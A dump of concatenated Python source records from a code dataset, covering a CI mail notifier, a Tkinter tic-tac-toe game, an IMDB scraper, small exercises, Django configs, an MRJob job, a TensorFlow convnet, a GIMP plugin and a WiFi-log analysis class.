build_uri('/builds/{0}/'.format(build.id.hex))\n\n context = {\n 'job': job,\n 'build': job.build,\n 'total_test_failures': num_test_failures,\n 'test_failures': test_failures,\n }\n\n if primary_log:\n context['build_log'] = {\n 'text': log_clipping,\n 'name': primary_log.name,\n 'link': '{0}logs/{1}/'.format(job.uri, primary_log.id.hex),\n }\n\n msg = Message(subject, recipients=recipients, extra_headers={\n 'Reply-To': ', '.join(sanitize_address(r) for r in recipients),\n })\n msg.body = render_template('listeners/mail/notification.txt', **context)\n msg.html = render_template('listeners/mail/notification.html', **context)\n\n mail.send(msg)\n\n\ndef get_job_options(job):\n option_names = [\n 'mail.notify-author',\n 'mail.notify-addresses',\n 'mail.notify-addresses-revisions',\n ]\n\n # get relevant options\n options = dict(\n db.session.query(\n ProjectOption.name, ProjectOption.value\n ).filter(\n ProjectOption.project_id == job.project_id,\n ProjectOption.name.in_(option_names),\n )\n )\n\n # if a plan was specified, it's options override the project's\n job_plan = JobPlan.query.filter(\n JobPlan.job_id == job.id,\n ).first()\n if job_plan:\n plan_options = db.session.query(\n ItemOption.name, ItemOption.value\n ).filter(\n ItemOption.item_id == job_plan.plan_id,\n ItemOption.name.in_(option_names),\n )\n # determine plan options\n for key, value in plan_options:\n options[key] = value\n\n return options\n\n\ndef job_finished_handler(job, **kwargs):\n options = get_job_options(job)\n\n recipients = []\n if options.get('mail.notify-author', '1') == '1':\n author = job.build.author\n if author:\n recipients.append(u'%s <%s>' % (author.name, author.email))\n\n if options.get('mail.notify-addresses'):\n recipients.extend(\n # XXX(dcramer): we dont have option validators so lets assume people\n # enter slightly incorrect values\n [x.strip() for x in options['mail.notify-addresses'].split(',')]\n )\n\n if not job.build.source.patch_id:\n if options.get('mail.notify-addresses-revisions'):\n recipients.extend(\n [x.strip() for x in options['mail.notify-addresses-revisions'].split(',')]\n )\n\n if not recipients:\n return\n\n if not should_notify(job):\n return\n\n send_notification(job, recipients)\n","sub_path":"changes/listeners/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":6191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"429905493","text":"# COSC 1336, Lab 10, Problem 3 (enhanced)\n# Robert Morales\n\nimport tkinter as tk\nimport tkinter.messagebox as msgbox\nimport random\nfrom itertools import permutations\n\nclass Board:\n \"\"\"\n Class representing a TicTacToe board.\n \"\"\"\n\n def __init__(self):\n \"\"\" Initializes the board object. \"\"\"\n self.__data = [[None]]\n\n def create(self, size = 3):\n \"\"\" Creates a TicTacToe board with the given size. \"\"\"\n if size < 3:\n raise ValueError('board size must be ≥ 3')\n self.__data = [[None for col in range(size)] for row in range(size)]\n return self\n\n def assign(self, data):\n \"\"\" Initializes the TicTacToe board from existing data. \"\"\"\n if len(data) != len(data[0]):\n raise ValueError(\"array must be square\")\n if len(data) < 3:\n raise ValueError('board size must be ≥ 3')\n self.__data = [[col for col in row] for row in data]\n return self\n\n def copy(self):\n \"\"\" Returns a copy of the TicTacToe board's data. \"\"\"\n return [[col for col in row] for row in self.__data]\n\n def size(self):\n \"\"\" Returns the number of rows and number of columns. \"\"\"\n return len(self.__data)\n\n def row(self, row_index):\n \"\"\" Returns all symbols in the specified row. \"\"\"\n return [el for el in self.__data[row_index]]\n\n def col(self, col_index):\n \"\"\" Returns all symbols in the specified column. \"\"\"\n return [row[col_index] for row in self.__data]\n\n def symbol(self, row_index, col_index):\n \"\"\" Returns the specified symbol at the row and column indices. \"\"\"\n return self.__data[row_index][col_index]\n\n def symbols(self, positions):\n \"\"\" Returns symbols at all specified row/column positions. \"\"\"\n return [self.__data[rx][cx] for rx,cx in positions]\n\n def is_blank(self, row_index, col_index):\n \"\"\" Determines if the specified cell is blank. \"\"\"\n return self.__data[row_index][col_index] is None\n\n def set_symbol(self, sym, row_index, col_index):\n \"\"\" Assigns the symbol to the specified cell in the board. \"\"\"\n self.__data[row_index][col_index] = sym\n\n def blanks(self):\n \"\"\" Returns the row and column indices of all blank symbols. \"\"\"\n return [(rx, cx) for rx, row in enumerate(self.__data) \\\n for cx, col in enumerate(row) if col is None]\n\n def num_blanks(self):\n \"\"\" Return the number of blank symbols. \"\"\"\n return len([col for row in self.__data for col in row if col is None])\n\n def diagonal(self, direction):\n \"\"\"\n Returns an iterator for all symbols in the specified diagonal pattern.\n \"\"\"\n size = self.size()\n temp = []\n if direction in ('left', '<'):\n for rx in range(size-1, -1, -1):\n yield self.__data[rx][rx]\n elif direction in ('right', '>'):\n for rx in range(size):\n yield self.__data[rx][size-rx-1]\n else:\n raise ValueError(\"invalid input: `direction` should be 'left' or 'right'\")\n\n def midpoint(self):\n \"\"\" Returns the center position of the board. \"\"\"\n idx = self.size() // 2\n return (idx, idx)\n\n def corners(self):\n \"\"\" Returns an iterator for the symbols in each corner of the board. \"\"\"\n for rx in [0,-1]:\n for cx in [0,-1]:\n yield self.__data[rx][cx]\n\n def side(self, side):\n \"\"\"\n Returns an iterator for all symbols from one side of the board.\n The 'side' parameter is a string that specifies either top, bottom,\n left, or right. The symbols '^', '_', '<', and '>' can also be used.\n \"\"\"\n size = len(self.__data)\n if side in ('^', 'top'):\n for cx in range(1,size-1):\n yield self.__data[0][cx]\n elif side in ('_', 'bottom'):\n for cx in range(1,size-1):\n yield self.__data[-1][cx]\n elif side in ('<', 'left'):\n for rx in range(1,size-1):\n yield self.__data[rx][0]\n elif side in ('>', 'right'):\n for rx in range(1,size-1):\n yield self.__data[rx][-1]\n else:\n raise ValueError(\"invalid request\")\n\n def side_positions(self):\n \"\"\"\n Returns an iterator for the row/column indices of \n all side positions on the board.\n \"\"\"\n sides = [(x,y) for x in [0,-1] for y in list(range(1, self.size()-1))]\n for i in range(len(sides)):\n for p in permutations(sides[i]):\n yield p\n\n def __str__(self):\n \"\"\" Returns the TicTacToe board as an ASCII drawing. \"\"\"\n strings = []\n strings.append('')\n for rx in range(self.size()):\n row_str = ''\n for cx in range(self.size()):\n sym = self.get_symbol(rx, cx) or ' '\n row_str += ' ' + sym\n if cx < self.num_cols()-1:\n row_str += ' |'\n strings.append(row_str)\n if rx < self.num_rows()-1:\n strings.append(('-----' * (self.num_cols()-1)) + '-')\n strings.append('')\n return str.join('\\n', strings)\n\nclass Game:\n def __init__(self):\n \"\"\" Initializes the Game object. \"\"\"\n self.board = None\n self.sym_user = None\n self.sym_cpu = None\n\n def new(self, size = 3, symbols = ('X', 'O')):\n \"\"\"\n Creates a new game.\n\n By default a 3x3 board is created with symbols 'X' representing\n the user and 'O' representing the computer. These parameters\n can be changed via 'size' and 'symbols', respectively.\n \"\"\"\n\n self.sym_user, self.sym_cpu = symbols\n self.board = Board()\n self.board.create(size)\n\n def move_user(self, row, col):\n \"\"\" Places the user's move. \"\"\"\n try:\n over, winner = self.status()\n if (not over) and self.board.is_blank(row, col):\n self.board.set_symbol(self.sym_user, row, col)\n return True\n else:\n return False\n except IndexError:\n raise IndexError(\"invalid row/column index\")\n\n def move_computer(self):\n \"\"\"\n Chooses the CPU's move using a predetermined strategy.\n \"\"\"\n over, winner = self.status()\n if over:\n return (None, None)\n\n board = self.board\n blanks = board.blanks()\n\n # the following symbol aliases are used for typing convenience\n X = self.sym_user\n O = self.sym_cpu\n\n # determine if we can win by placing 'o' in all the blanks\n for rx, cx in blanks:\n board.set_symbol(O, rx, cx)\n over, winner = self.status()\n if over and winner == O:\n return (rx, cx)\n else:\n board.set_symbol(None, rx, cx)\n\n # block opponent from winning on their next move\n for rx, cx in blanks:\n board.set_symbol(X, rx, cx)\n over, winner = self.status()\n if over and winner == X:\n board.set_symbol(O, rx, cx)\n return (rx, cx)\n else:\n board.set_symbol(None, rx, cx)\n\n # block opponent's fork, if we have the midpoint\n rx, cx = board.midpoint()\n if board.symbol(rx, cx) == O and X in board.corners():\n # avoid playing a corner!\n for rx, cx in board.side_positions():\n if board.is_blank(rx, cx):\n board.set_symbol(O, rx, cx)\n return (rx, cx)\n\n # go for the center\n rx, cx = board.midpoint()\n if board.is_blank(rx, cx):\n board.set_symbol(O, rx, cx)\n return (rx, cx)\n\n # choose an empty corner\n for rx, cx in [(0,0), (0,-1), (-1,0), (-1,-1)]:\n if board.is_blank(rx, cx):\n board.set_symbol(O, rx, cx)\n return (rx, cx)\n\n # choose an empty side\n for rx, cx in board.side_positions():\n if board.is_blank(rx, cx):\n board.set_symbol(O, rx, cx)\n return (rx, cx)\n\n # choose randomly, if there's absolutely nothing left...\n rx, cx = random.choice(blanks)\n board.set_symbol(O, rx, cx)\n return (rx, cx)\n\n def status(self):\n \"\"\"\n Returns the status of the game.\n\n The status consists of two values: a Boolean indicating if the\n game is considered over, due to either a tie or a win, and a\n string containing the winner (if there is no tie).\n \"\"\"\n over = False\n winner = None\n board = self.board\n symbols = ([self.sym_user] * board.size(),\n [self.sym_cpu] * board.size())\n\n # check each row for a win\n for rx in range(board.size()):\n if board.row(rx) in symbols:\n over = True\n winner = board.symbol(rx, 0)\n break\n\n # check each column for a win\n if not over:\n for cx in range(board.size()):\n if board.col(cx) in symbols:\n over = True\n winner = board.symbol(0, cx)\n break\n\n # check diagonals for a win\n if not over:\n if (board.diagonal('<') in symbols) or (board.diagonal('>') in symbols):\n over = True\n mid_row, mid_col = board.midpoint()\n winner = board.symbol(mid_row, mid_col)\n\n # check for a tie\n if not over:\n over = board.num_blanks() == 0\n\n return over, winner\n\n def is_over(self):\n \"\"\" Shortcut method to determine if the game is over. \"\"\"\n if None in (self.board, self.sym_user, self.sym_cpu):\n return True\n\n over, winner = self.status()\n return over\n\nclass Application:\n def __init__(self, parent):\n self.bsize = 3\n self.syms = ('X', 'O')\n self.game = Game()\n\n # main frame: TicTacToe button board\n # contains sub-frames for each row of buttons\n\n self.frame1 = tk.Frame(parent)\n self.buttons = [[None for cx in range(self.bsize)] \\\n for rx in range(self.bsize)]\n\n for rx in range(self.bsize):\n row_frame = tk.Frame(self.frame1)\n for cx in range(self.bsize):\n btn = tk.Button(row_frame, text='')\n btn['command'] = lambda rx=rx, cx=cx: self.button_click(rx, cx)\n btn['width'] = 12\n btn['height'] = btn['width'] // 2\n btn['disabledforeground'] = btn['fg']\n btn['state'] = tk.DISABLED\n btn.pack()\n self.buttons[rx][cx] = btn\n row_frame.pack(side='left')\n\n self.frame2 = tk.Frame(parent)\n self.frame2_button1 = tk.Button(self.frame2, text=\"New Game\", command=self.new_game)\n self.frame2_button1.pack(side=tk.LEFT)\n self.frame2.pack()\n\n self.frame3 = tk.Frame(parent)\n self.status = tk.StringVar()\n self.frame3_label1 = tk.Label(parent, textvariable=self.status)\n self.frame3_label1.pack(side='bottom')\n self.frame3.pack()\n self.frame1.pack()\n\n self.set_status(\"Click [New Game] to begin.\")\n\n def new_game(self):\n game = self.game\n\n if not game.is_over() and not msgbox.askyesno(\"Warning!\", \"The game isn't over yet.\\nDo you want to abandon this game and start another?\"):\n return\n\n self.game.new(self.bsize, self.syms)\n\n size = game.board.size()\n for rx in range(size):\n for cx in range(size):\n btn = self.buttons[rx][cx]\n btn['text'] = ''\n btn['state'] = tk.NORMAL\n btn['cursor'] = 'hand1'\n\n self.set_status(\"Select a move.\")\n\n def set_status(self, fmt, *args):\n self.status.set(fmt.format(*args))\n\n def mark_button(self, rx, cx):\n btn = self.buttons[rx][cx]\n btn[\"text\"] = self.game.board.symbol(rx, cx)\n btn[\"state\"] = tk.DISABLED\n btn['cursor'] = 'arrow'\n\n def button_click(self, row_index, col_index):\n game = self.game\n\n if game.move_user(row_index, col_index):\n #print(game.board)\n self.mark_button(row_index, col_index)\n\n over, winner = game.status()\n\n if not over:\n cpu_rx, cpu_cx = game.move_computer()\n #print(game.board)\n over, winner = game.status()\n\n if cpu_rx < 0:\n cpu_rx += game.board.size()\n if cpu_cx < 0:\n cpu_cx += game.board.size()\n\n self.set_status(\"You played {},{}; CPU played {},{}\", row_index,\n col_index, cpu_rx, cpu_cx)\n\n self.mark_button(cpu_rx, cpu_cx)\n\n if over:\n if winner is None:\n self.set_status(\"Game ended in a tie.\")\n elif winner == game.sym_user:\n self.set_status(\"You won!\")\n elif winner == game.sym_cpu:\n self.set_status(\"You lost.\")\n else:\n msgbox.showerror('TicTacToe', 'Invalid move.')\n\nroot = tk.Tk()\napp = Application(root)\nroot.mainloop()\n","sub_path":"lab10/tic_tac_toe_enhanced_v1.py","file_name":"tic_tac_toe_enhanced_v1.py","file_ext":"py","file_size_in_byte":13417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"27496707","text":"#!/usr/bin/env python\n# Name: David van Schie\n# Student number: 10800999\n\"\"\"\nThis script scrapes IMDB and outputs a CSV file with highest rated tv series.\n\"\"\"\n\nimport sys\nimport csv\nimport requests\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\nfrom bs4 import BeautifulSoup\n\nTARGET_URL = \"http://www.imdb.com/search/title?num_votes=5000,&sort=user_rating,desc&start=1&title_type=tv_series\"\nBACKUP_HTML = 'tvseries.html'\nOUTPUT_CSV = 'tvseries.csv'\n\n \ndef extract_tvseries(dom):\n \"\"\"\n Extract a list of highest rated TV series from DOM (of IMDB page).\n Each TV series entry should contain the following fields:\n - TV Title\n - Rating\n - Genres (comma separated if more than one)\n - Actors/actresses (comma separated if more than one)\n - Runtime (only a number!)\n \"\"\"\n\n rget = requests.get(TARGET_URL)\n soup = BeautifulSoup(rget.text, \"html.parser\")\n\n # all tv show info can be found in div classes called 'lister-item mode-advanced'\n allshows = soup.find_all('div', class_ = 'lister-item mode-advanced')\n\n title = []\n rating = []\n runtime = []\n genre = []\n actor = []\n\n # find and extract tv show info \n for show in allshows:\n title.append(show.h3.a.text)\n rating.append(show.strong.text)\n runtime.append(show.find('span', class_='runtime').text.strip(\" min\"))\n genre.append(show.find('span', class_ = 'genre').text.split())\n searchactor = show.find_all('p')[2].find_all('a')\n serie_actors = []\n for i in searchactor:\n serie_actors.append(i.text)\n actor.append(serie_actors)\n\n tvshows = {'Title': title, 'Rating': rating, 'Runtime': runtime, 'Genre' : genre, 'Actors': actor}\n\n return tvshows\n\ndef save_csv(outfile, tvseries):\n\n # necessary for writing unicode\n reload(sys)\n sys.setdefaultencoding('utf8')\n\n title = tvseries['Title']\n rating = tvseries['Rating']\n runtime = tvseries['Runtime']\n genre = tvseries['Genre']\n actor = tvseries['Actors']\n\n writer = csv.writer(outfile) \n writer.writerow(['Title', 'Rating', 'Genre', 'Runtime', 'Actors'])\n\n # write every tv show to a row\n for i in range(50):\n writer.writerow((title[i], rating[i], ''.join(map(str, genre[i])), runtime[i], ','.join(actor[i])))\n\ndef simple_get(url):\n \"\"\"\n Attempts to get the content at `url` by making an HTTP GET request.\n If the content-type of response is some kind of HTML/XML, return the\n text content, otherwise return None\n \"\"\"\n try:\n with closing(get(url, stream=True)) as resp:\n if is_good_response(resp):\n return resp.content\n else:\n return None\n except RequestException as e:\n print('The following error occurred during HTTP GET request to {0} : {1}'.format(url, str(e)))\n return None\n\n\ndef is_good_response(resp):\n \"\"\"\n Returns true if the response seems to be HTML, false otherwise\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code == 200\n and content_type is not None\n and content_type.find('html') > -1)\n\n\nif __name__ == \"__main__\":\n\n # get HTML content at target URL\n html = simple_get(TARGET_URL)\n\n # save a copy to disk in the current directory, this serves as an backup\n # of the original HTML, will be used in grading.\n with open(BACKUP_HTML, 'wb') as f:\n f.write(html)\n\n # parse the HTML file into a DOM representation\n dom = BeautifulSoup(html, 'html.parser')\n\n # extract the tv series (using the function you implemented)\n tvseries = extract_tvseries(dom)\n\n # write the CSV file to disk (including a header)\n with open(OUTPUT_CSV, 'w',) as output_file:\n save_csv(output_file, tvseries)\n ","sub_path":"Homework/Week_1/Scraping/tvscraper.py","file_name":"tvscraper.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"32220961","text":"#################################################################################\n\nimport math\n\n\naction = int(input(\"\"\"What do you want to do with numbers\n1. Addition\n2. Subtraction\n3. Multiplication\n4. Division\nInput, please: \"\"\"))\n\n\ndef addition():\n list_with_numbers = []\n amount_of_numbber = int(input(\"How much numbers do you want to add: \"))\n for x in range(amount_of_numbber):\n users_numbers = int(input(\"Enter value: \"))\n list_with_numbers.append(users_numbers) \n print(\"Sum of this numbers is\", sum(list_with_numbers))\n\ndef subtraction():\n first_value = int(input(\"First value: \"))\n second_value = int(input(\"Second value: \"))\n print(\"Subtraction result of this numbers is\", first_value - second_value)\n\n\ndef multiplication():\n list_with_numbers = []\n amount_of_numbber = int(input(\"How much numbers do you want to multiply: \"))\n for x in range(amount_of_numbber):\n users_numbers = int(input(\"Enter value: \"))\n list_with_numbers.append(users_numbers) \n print(\"Result of multiplication of this numbers is\", math.prod(list_with_numbers))\n\ndef division():\n first_value = int(input(\"First value: \"))\n second_value = int(input(\"Second value: \"))\n print(\"Division result of this numbers is\", first_value / second_value)\n\nif action == 1:\n addition()\nif action == 2:\n subtraction()\nif action == 3:\n multiplication()\nif action == 4:\n division()\n\n#################################################################################\n\nimport random\n\nrandom_value = random.randint(1,100)\nuser_value = int(input(\"Your value?: \"))\n\nwhile user_value != random_value:\n if user_value > random_value:\n user_value = (int(input(\"Go down: \")))\n continue\n elif user_value < random_value:\n user_value = (int(input(\"Try bigger: \")))\n continue\n \nif user_value == random_value:\n print(\"You win\") \n\n\n#################################################################################","sub_path":"classwork07_04.py","file_name":"classwork07_04.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"168828506","text":"\"\"\"JavaDispatch URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf.urls import url,include\nfrom django.views.generic import RedirectView\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n #login\n url(r'^$',RedirectView.as_view(url='/account/login')),\n \n #account\n url(r'^account/',include(\"account.urls\")),\n \n #server\n url(r'^server/',include(\"server.urls\")),\n \n #application\n url(r'^application/',include(\"application.urls\")),\n \n #deployconfig\n url(r'^deployConfig/',include(\"DeployConfig.urls\")),\n\n #jdfile\n url(r'^jdfile/',include(\"jdfile.urls\")),\n #task\n url(r'^task/',include(\"task.urls\")),\n]\n","sub_path":"JavaDispatch/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"263809007","text":"#!/usr/bin/env python\n#coding=utf-8\n\nimport sys\nimport json\nimport os\nfrom itertools import combinations\n\nfrom mrjob.job import MRJob\nfrom mrjob.protocol import RawValueProtocol\nfrom pyutil.springdb import SpringDBClient\n\n#INPUT_FILE = os.environ.get('mapreduce_map_input_file','none')\nclass MRGetFriend(MRJob):\n key_tmpl = \"aweme_user_friend_%s\"\n def mapper(self, _, line):\n try:\n lst = line.split(\"\\t\")\n uid, ttype = lst[0].strip('\"').split('_')\n if ttype != \"friend\":\n return\n friend_list = json.loads(lst[1])\n if uid and friend_list:\n yield uid, friend_list\n\n except Exception as err:\n print >>sys.stderr, str(err)\n\n def reducer_init(self):\n SpringDBClient.set_zone(\"online\")\n self._springdb = SpringDBClient(\"springdb_essay_profile\", \"aweme_user_relation\", socket_timeout=5)\n self.expire_time = 86400 * 10\n\n def reducer(self, uid, values):\n pipe = self._springdb.pipeline()\n friend_list = list()\n for v in values:\n friend_list = v\n info = json.dumps(friend_list)\n key = self.key_tmpl % uid\n pipe.setex(key, info, self.expire_time)\n pipe.execute()\n\nif __name__ == '__main__':\n MRGetFriend.run()\n","sub_path":"essay_pipeline/user_relation_mining/get_friend_mr.py","file_name":"get_friend_mr.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"417033931","text":"from django.contrib import admin\nfrom games.models import Game,Score, Cheat\n\nclass GameAdmin(admin.ModelAdmin):\n\tclass ChoiceInline(admin.TabularInline):\n\t\tmodel = Score\n\t\textra = 0\n\n\tfields= (('name','price'), 'doge_address',)\n\tlist_display = ('name','doge_address','price','get_account_balance',)\n\tlist_editable = ('price',)\n\tinlines= [ChoiceInline]\n\nclass CheatAdmin(admin.ModelAdmin):\n\tsearch_fields = ('user__username',)\n\tfields = (('user','game'), ('reason','value'), 'log',)\n\tdate_hierarchy = 'date'\n\tlist_display = ('user','game','reason','value','date')\n\nadmin.site.register(Game,GameAdmin)\nadmin.site.register(Cheat,CheatAdmin)","sub_path":"games/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"42739864","text":"import numpy as np\nimport tensorflow as tf\n\n\ndef conv(bottom, filt_name, filt_shape):\n filt = tf.Variable(initial_value=tf.truncated_normal(shape=filt_shape, stddev=0.01), name=filt_name)\n bias = tf.Variable(initial_value=tf.truncated_normal(shape=[filt_shape[3], ], stddev=0.001),\n name=filt_name + \"bias\")\n layer = tf.nn.conv2d(bottom, filt, strides=[1, 1, 1, 1], padding=\"SAME\") + bias\n return tf.nn.relu(layer)\n\n\ndef max_pool(bottom, name):\n return tf.nn.max_pool(bottom, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', name=name)\n\n\ndef f_c(bottom, w_name, w_shape,activation_func=True):\n w_fc = tf.Variable(tf.truncated_normal(w_shape, stddev=0.1), name=w_name)\n bias_fc = tf.Variable(tf.constant(0.1, shape=[w_shape[1], ]), name=w_name + \"bias\")\n if activation_func:\n return tf.nn.relu(tf.matmul(bottom, w_fc) + bias_fc)\n else:\n return tf.matmul(bottom, w_fc) + bias_fc\n\n\ndef net(input_image, keep_prob):\n \n input_image = tf.reshape(input_image, [-1, 28, 28, 1])\n\n conv_5x5_in = conv(input_image, \"conv_5x5_in\", [5, 5, 1, 64])\n\n conv_2 = conv(conv_5x5_in, \"conv_2\", [3, 3, 64, 64])\n pool1 = max_pool(conv_2, 'pool1')\n\n conv_3 = conv(pool1, \"conv_3\", [3, 3, 64, 64])\n pool2 = max_pool(conv_3, 'pool2')\n\n pool2_flat = tf.reshape(pool2, [-1, 7*7*64])\n\n fc1 = f_c(pool2_flat, w_name=\"fc_1\", w_shape=[7 * 7 * 64, 1024])\n h_fc1_drop = tf.nn.dropout(fc1, keep_prob)\n\n fc2 = f_c(h_fc1_drop, w_name=\"fc_2\", w_shape=[1024, 10],activation_func=False)\n\n prediction = tf.argmax(fc2,1)\n \n return prediction\n","sub_path":"src/convNet.py","file_name":"convNet.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"233333225","text":"import sys\nfrom os.path import dirname, realpath\n\nsys.path.append(realpath(dirname(__file__)))\nfrom gimpfu import main\nfrom _plugin_base import GimpPluginBase\n\n\nclass Colorize(GimpPluginBase):\n def run(self):\n self.model_file = 'NeuralColorization.py'\n result = self.predict(self.drawable)\n self.create_image(result)\n\n\nplugin = Colorize()\nplugin.register(\n proc_name=\"colorize\",\n blurb=\"colorize\",\n help=\"Colorize grayscale images\",\n author=\"Kritik Soman\",\n copyright=\"\",\n date=\"2020\",\n label=\"colorize...\",\n imagetypes=\"GRAY*\"\n)\nmain()\n","sub_path":"plugins/colorize.py","file_name":"colorize.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"14057663","text":"'''\nCreated on Aug 10, 2020\n\n@author: haruka\n'''\nimport os\nimport csv\nimport time\nimport pprint\nimport pandas as pd\nimport numpy as np\nimport mysql.connector\n\nclass Wifilogcsv02_lib :\n\n def __init__(self, filepath):\n self.filepath = filepath\n self.csv_tfile = \"\"\n self.file_tlist = []\n self.csv_dfile = \"\"\n self.file_dlist = []\n self.duration_all = 0\n self.APlocations = []\n self.transition_all =[]\n self.transition_rate = []\n self.transitions_gall = []\n self.transition_grate = []\n # コネクションの作成\n #dbh = mysql.connector.connect(\n # host='cloud02.mizunolab.info',\n ## port='3306',\n # db='mznwifilog',\n # user='mznwifilog',\n # password='kansoukikashiteyo',\n # charset='utf8'\n #)\n #print(dbh.is_connected())\n #self.cur = dbh.cursor()\n\n def get_APlocations(self,csv_name):\n self.APlocations = pd.read_csv(csv_name, engine='python')\n\n def get_csv_tfile(self, csv_tfile):\n self.csv_tfile = csv_tfile\n self.file_tlist = []\n for file in os.listdir(self.filepath):\n is_tfile = 'transition' in file #transitionファイルか?\n not_csv_file = self.csv_tfile != file# リストCSVファイルでないか\n if is_tfile and not_csv_file:\n self.file_tlist.append(file)\n #print(self.file_tlist)\n\n for i in range(len(self.file_tlist)):\n if i == 0:\n self.transition_all = pd.read_csv(self.filepath+'/'+self.file_tlist[i], engine='python', index_col=0)\n else:\n self.transition_all += pd.read_csv(self.filepath+'/'+self.file_tlist[i], engine='python', index_col=0)\n #print(self.transition_all)\n self.transition_all.to_csv(self.filepath+'/'+self.csv_tfile)\n return self.transition_all\n\n def get_rate_tfile(self, transition_all):\n self.transition_rate = transition_all\n tsum = transition_all.sum(axis=1) # 行ごとの合計を算出(文字データはむし)\n #print(tsum)\n for c in self.transition_rate.columns:\n self.transition_rate[c] = self.transition_rate[c]/tsum\n transition_rate = self.transition_rate.fillna(0)\n #print(transition_rate)\n transition_rate.to_csv(self.filepath+'/trate.csv')\n return transition_rate\n\n def get_rate_tfile2(self, transition_all):\n self.transition_rate = transition_all\n tsum = transition_all.sum(axis=1) # 行ごとの合計を算出(文字データはむし)\n dlist = list(tsum[tsum == 0].index)\n #print(dlist)\n self.transition_rate = self.transition_rate.drop(dlist)\n self.transition_rate = self.transition_rate.drop(self.transition_rate.columns[dlist], axis=1)\n #print(transition_rate)\n self.transition_rate.to_csv(self.filepath+'/markov_rate.csv')\n self.APlocations.drop(dlist).to_csv(self.filepath+'/markov_AP.csv')\n\n #for column_name, item in transition_rate.iteritems():\n #print(column_name)\n #for column_name2, item2 in item.iteritems():\n #print(column_name2, item2)\n return self.transition_rate\n\n def get_csv_tfile_group(self, csv_tfile):\n APid = self.APlocations['AP'].str.split('Bldg', expand=True)[1].str.split('AP', expand=True)[0].str.split('_', expand=True)[0]\n print(self.filepath+'/'+csv_tfile)\n with open(self.filepath+'/'+csv_tfile) as f:\n reader = csv.reader(f)\n l = [row for row in reader]\n tall = [[int(v) for v in row[1:]] for row in l[1:]]\n gtall = [[0] * 49 for i in range(49)]#外部もあるため+1\n #print(gtall)\n for i, iname in enumerate(APid):\n #print(i, iname)\n for j, jname in enumerate(APid):\n #print(j, jname)\n gtall[int(iname)-1][int(jname)-1] = gtall[int(iname)-1][int(jname)-1] + tall[i][j]\n gtall[int(iname)-1][48] = gtall[int(iname)-1][48] + tall[i][-1]#外部用\n for i, iname in enumerate(APid):\n #print(i, iname)\n gtall[48][int(iname)-1] = gtall[48][int(iname)-1] + tall[-1][i]\n gtall[48][48] = gtall[48][48] + tall[-1][-1]#外部用\n #print(gtall[48])\n self.transitions_gall = pd.DataFrame(gtall,index=[i for i in range(len(gtall))],columns=[i for i in range(len(gtall))])\n self.transitions_gall.to_csv(self.filepath+'/gtransitions_all.csv')\n\n return self.transitions_gall\n\n\n def get_rate_tfile_group(self, transition_gall):\n self.transition_grate = transition_gall\n tsum = transition_gall.sum(axis=1) # 行ごとの合計を算出(文字データはむし)\n #print(tsum)\n for c in self.transition_grate.columns:\n self.transition_grate[c] = self.transition_grate[c]/tsum\n transition_grate = self.transition_grate.fillna(0)\n #print(transition_grate)\n transition_grate.to_csv(self.filepath+'/gtrate.csv')\n return transition_grate\n\n def get_rate_tfile2_group(self, transition_gall):\n self.transition_grate = transition_gall\n tsum = transition_gall.sum(axis=1) # 行ごとの合計を算出(文字データはむし)\n dlist = list(tsum[tsum == 0].index)\n #print(dlist)\n self.transition_grate = self.transition_grate.drop(dlist)\n self.transition_grate = self.transition_grate.drop(self.transition_grate.columns[dlist], axis=1)\n #print(transition_grate)\n self.transition_grate.to_csv(self.filepath+'/markov_grate.csv')\n self.APlocations.drop(dlist).to_csv(self.filepath+'/markov_gAP.csv')\n return self.transition_grate\n\n def get_csv_dfile(self, csv_dfile):\n self.csv_dfile = csv_dfile\n self.file_dlist = []\n for file in os.listdir(self.filepath):\n is_tfile = 'duration' in file#transitionファイルか?\n not_csv_file = self.csv_dfile != file# リストCSVファイルでないか\n if is_tfile and not_csv_file:\n self.file_dlist.append(file)\n #print(self.file_dlist)\n\n for i in range(len(self.file_dlist)):\n if i == 0:\n pd.read_csv(self.filepath+'/'+self.file_dlist[i], engine='python').to_csv(self.filepath+'/'+self.csv_dfile, columns=['duration','from','to'], index=False)\n else:\n pd.read_csv(self.filepath+'/'+self.file_dlist[i], engine='python').to_csv(self.filepath+'/'+self.csv_dfile, header=False, columns=['duration','from','to'], index=False, mode=\"a\")\n\n self.duration_all = pd.read_csv(self.filepath+'/'+self.csv_dfile, engine='python')\n #print(self.duration_all)\n return self.duration_all\n\n def get_meantime(self):\n meantime = [-1 for i in range(len(self.APlocations))]\n for i in 